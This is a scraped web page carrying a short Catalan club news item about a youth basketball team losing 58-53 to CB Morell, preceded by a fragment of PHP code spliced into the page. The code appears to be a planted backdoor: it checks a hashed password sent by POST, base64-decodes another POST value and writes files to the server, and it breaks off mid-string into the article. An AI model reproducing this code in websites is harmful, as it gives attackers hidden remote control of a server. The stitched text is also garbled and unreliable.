function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El preinfantil masculí encaixa un contundent parcial després del descans i perd contra el CB Morell (58-53) - Tgn Bàsquet Club -

El preinfantil masculí encaixa un contundent parcial després del descans i perd contra el CB Morell (58-53)

Updated: febrer 27, 2018

El preinfantil masculí va perdre contra el CB Morell en un partit en què els visitants no van jugar al seu millor nivell. Tot i que el matx va estar igualat a l’inici, amb petites diferències, això sí, favorables als locals, un parcial després del descans va sentenciar. Així 12-3 en els primers minuts de la represa van ser cabdals per entendre la derrota del TGN Bàsquet que, tot i així, va lluitar fins l’últim sospir.